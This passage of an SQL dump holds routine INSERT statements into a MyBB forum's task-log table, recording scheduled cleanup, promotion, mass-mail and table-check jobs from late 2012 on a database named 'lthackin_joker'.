'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15416', '7', '1352363411', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15417', '5', '1352363461', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15418', '3', '1352364557', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15419', '9', '1352368425', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15420', '5', '1352368819', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15421', '3', '1352368833', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15422', '1', '1352369365', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15423', '7', '1352369369', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15424', '9', '1352371006', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15425', '5', '1352371026', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15426', '3', '1352371057', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15427', '9', '1352371240', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15428', '5', '1352371882', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15429', '9', '1352372132', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15430', '3', '1352372375', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15431', '1', '1352372993', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15432', '7', '1352373003', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15433', '5', '1352373011', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15434', '9', '1352373015', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15435', '5', '1352375050', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15436', '9', '1352375059', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15437', '3', '1352375063', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15438', '5', '1352375109', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15439', '9', '1352377696', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15440', '3', '1352377742', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15441', '1', '1352378685', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15442', '7', '1352379332', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15443', '5', '1352379340', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15444', '3', '1352379360', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15445', '9', '1352380152', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15446', '3', '1352381971', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15447', '1', '1352383938', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15448', '7', '1352383946', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15449', '5', '1352383950', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15450', '9', '1352383978', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15451', '3', '1352383990', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15452', '5', '1352385233', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15453', '9', '1352385708', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15454', '3', '1352386987', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15455', '5', '1352387090', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15456', '9', '1352387093', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15457', '1', '1352387174', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15458', '7', '1352387996', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15459', '5', '1352388005', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15460', '9', '1352389679', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15461', '5', '1352389690', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15462', '3', '1352390546', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15463', '9', '1352392125', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15464', '1', '1352392580', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15465', '7', '1352393054', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15466', '5', '1352393070', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15467', '3', '1352393661', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15468', '9', '1352394295', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15469', '5', '1352394296', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15470', '3', '1352394340', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15471', '1', '1352394344', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15472', '7', '1352394359', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15473', '5', '1352396548', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15474', '9', '1352398369', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15475', '3', '1352398451', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15476', '5', '1352398481', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15477', '1', '1352398696', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15478', '7', '1352398697', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15479', '5', '1352399840', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15480', '9', '1352402905', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15481', '3', '1352402985', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15482', '5', '1352403045', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15483', '1', '1352405264', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15484', '7', '1352405298', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15485', '3', '1352405313', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15486', '9', '1352406564', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15487', '5', '1352406579', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15488', '3', '1352406749', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15489', '9', '1352408010', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15490', '5', '1352408012', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15491', '9', '1352408185', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15492', '3', '1352408426', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15493', '1', '1352408433', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15494', '7', '1352408438', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15495', '5', '1352408722', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15496', '9', '1352409522', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15497', '5', '1352410488', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15498', '9', '1352410994', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15499', '3', '1352411007', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15500', '5', '1352411464', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15501', '9', '1352412193', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15502', '3', '1352412214', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15503', '1', '1352412242', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15504', '7', '1352412244', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15505', '5', '1352412695', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15506', '9', '1352412724', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15507', '5', '1352413589', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15508', '9', '1352413608', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15509', '3', '1352413851', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15510', '9', '1352414430', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15511', '5', '1352414719', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15512', '9', '1352418570', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15513', '3', '1352418584', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15514', '1', '1352418598', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15515', '7', '1352418602', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15516', '5', '1352418606', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15517', '9', '1352420172', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15518', '3', '1352422036', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15519', '1', '1352422042', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15520', '2', '1352422891', 'The daily cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15521', '7', '1352422897', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15522', '11', '1352422920', 'The delayed moderation task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15523', '5', '1352422954', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15524', '9', '1352422980', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15525', '3', '1352422980', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15526', '1', '1352422985', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15527', '5', '1352424477', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15528', '9', '1352424964', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15529', '3', '1352425157', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15530', '9', '1352426442', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15531', '5', '1352426498', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15532', '3', '1352426585', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15533', '1', '1352426949', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15534', '7', '1352426970', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15535', '5', '1352426985', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15536', '9', '1352427119', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15537', '5', '1352427960', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15538', '9', '1352427969', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15539', '3', '1352428814', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15540', '9', '1352428961', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15541', '5', '1352430521', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15542', '9', '1352430718', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15543', '3', '1352430818', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15544', '1', '1352430830', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15545', '7', '1352430847', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15546', '5', '1352431533', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15547', '9', '1352431562', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15548', '3', '1352431805', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15549', '9', '1352432522', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15550', '5', '1352432997', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15551', '9', '1352434109', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15552', '3', '1352434177', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15553', '1', '1352435729', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15554', '7', '1352435735', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15555', '5', '1352436106', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15556', '9', '1352436120', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15557', '3', '1352436133', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15558', '5', '1352436427', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15559', '9', '1352437093', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15560', '3', '1352437152', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15561', '1', '1352437259', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15562', '7', '1352437542', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15563', '5', '1352437606', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15564', '9', '1352440784', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15565', '5', '1352440791', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15566', '3', '1352440852', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15567', '1', '1352440960', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15568', '7', '1352441027', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15569', '5', '1352441116', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15570', '9', '1352441504', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15571', '5', '1352442873', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15572', '9', '1352443158', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15573', '3', '1352443167', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15574', '9', '1352443222', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15575', '5', '1352443504', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15576', '9', '1352445837', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15577', '3', '1352448964', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15578', '1', '1352449196', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15579', '7', '1352449226', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15580', '5', '1352449244', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15581', '9', '1352449443', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15582', '5', '1352449520', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15583', '9', '1352449567', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15584', '3', '1352449927', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15585', '9', '1352450626', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15586', '5', '1352450780', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15587', '9', '1352451392', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15588', '3', '1352451669', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15589', '1', '1352451678', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15590', '7', '1352451684', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15591', '5', '1352452157', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15592', '9', '1352452337', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15593', '5', '1352454391', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15594', '9', '1352454941', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15595', '3', '1352454942', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15596', '3', '1352463842', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15597', '1', '1352464405', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15598', '7', '1352464416', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_datacache, lthackin_joker.mybb_forums, lthackin_joker.mybb_sessions, lthackin_joker.mybb_threads, lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history, lthackin_joker.mybb_users table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15599', '5', '1352464424', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15600', '9', '1352464426', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15601', '3', '1352464569', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15602', '9', '1352468366', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15603', '5', '1352468486', 'The promotions task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15604', '3', '1352468494', 'The user cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15605', '1', '1352468521', 'The hourly cleanup task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15606', '7', '1352468548', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15607', '9', '1352468657', 'The mass mail task successfully ran.'); INSERT INTO `mybb_tasklog` (`lid`, `tid`, `dateline`, `data`) VALUES ('15608', '5', 